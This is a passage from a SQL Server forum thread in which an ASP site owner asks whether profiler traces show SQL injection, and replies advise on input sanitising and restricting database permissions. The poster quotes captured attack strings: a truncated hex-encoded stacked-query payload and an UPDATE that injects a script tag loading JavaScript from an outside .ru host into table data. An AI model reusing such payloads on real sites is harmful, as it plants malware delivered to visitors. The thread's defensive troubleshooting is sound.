Does this look like a SQL injection attack?

  • John: wide post dude! 😀

    Casa51: My Assumptions:

    1. Your database is accessed by a web application.

    2. You take user input via the web application and insert it into your database.

    This implies that your web pages which accept input have 'bad' code in them for updating the database.

    To fix this you need to parse, type and truncate the input to the expected size and allowed values, i.e. remove all of the things you believe are illegal characters before posting it to your database.

    Just out of interest in which programming language is your web app built in?

    --Shaun

    Hiding under a desk from SSIS Implemenation Work :crazy:

  • What kind of Rights does the Web Application User have? Check the rights of the user and remove access to objects that are not needed.

    -Roy

  • Sorry 😀

  • When you run the profiler how are you seeing the entire string.

    Select sectionID, heading from ordered where virtualSectionID_p =

    '003;DECLARE @s-2 VARCHAR(4000);SET @s-2=CAST(0x4445434C415...'

    I might just run a profiler here to see - what options did you use for the profiler.

    What happens if your not having profiler run all the time then your never know hmm.

    Now for the web user login (what rights do you disable got a bit lost on thread ).

  • You can deny all on any tables that you want for that user.

    For example if Test is the web user, then you can do a

    deny all on sysobjects to test

    That will make sure that the user Test cannot select from sysobjects table. Please be careful when you revoke grant permissions to system tables.

    -Roy

  • Is this for all the databases or just the one particular database.

    deny all on sysobjects to test

    How do you do this in the gui or at least see it deny for the user.

  • That is for that particular DB. You can try to login with the user and do a select on sysobjects. You will see an access denied

    -Roy

  • be back !

    thanks for all

    1 - i use asp 3.0 for dev

    2 - i create one user for my database

    ( database ISLE : USER ISLEU)

    3 - in SECURITY /user repertory of ISLE DATABASE they have

    - guest

    - dbo

    - INFORMATION_SHEMA

    - ISLEU

    - sys

    4 - USERU have select connect update delete insert on database

    where can i see if USERU have sys table authorisation ?

    must crete a specific connection for my back offcie

    with (DELETE update.....)

    and an other for my front office with only connect ?

    in sql profiler i see

    UPDATE [CALENDRIER] SET [TITREDATE]=RTRIM(CONVERT(VARCHAR(4000),[TITREDATE]))+' script src=http://www.4net9.ru/script.js /script '

    but in IIS log nothing !!!

    where the attack send this request ? .

    it not a query string be cause url_scan stop it.

    thanks

  • I do not think that it came in as query string. If the page has Input Boxes where customer/user can enter values, then it must have come through there.

    I really do not think that it is a good idea to give Select, Update, Insert and delete operation to the web user for the Database.

    You can just connect to the SSMS using the web user and run the query select * from sysobjects. If it gives you rows, then it has permission. You can just revoke the Permission.

    If I were in your place, I would ask the programmers to make stored procs for all DML that is called from Web app and revoke all grants to the tables in your DB. Just my 2 cents

    -Roy

  • ok thanks

  • Denying/Revoking rights to users/logins on objects is the way to go, but any rights granted to the public role will override the deny/revoke on the user as everybody has this role by default.

    Also your web app user that access the database should never have the dbowner role.

    Hiding under a desk from SSIS Implemenation Work :crazy:

  • YEAHHHHHHHHHHHHHHHHHHHHHHHHHHHH

    thanks for all i found the error

    my mistake is to transfert the db from 2000 to 2005 server i use my datasave tools "retrospect"

    and is give a wrong user authorization !

    i trie to connect with web user to my database and i can look all tables and all system database !!!

    i just delete connection and rebuilt it and all is good !!!!

    THANKS for all

Viewing 12 posts - 31 through 41 (of 41 total)

You must be logged in to reply to this topic. Login to reply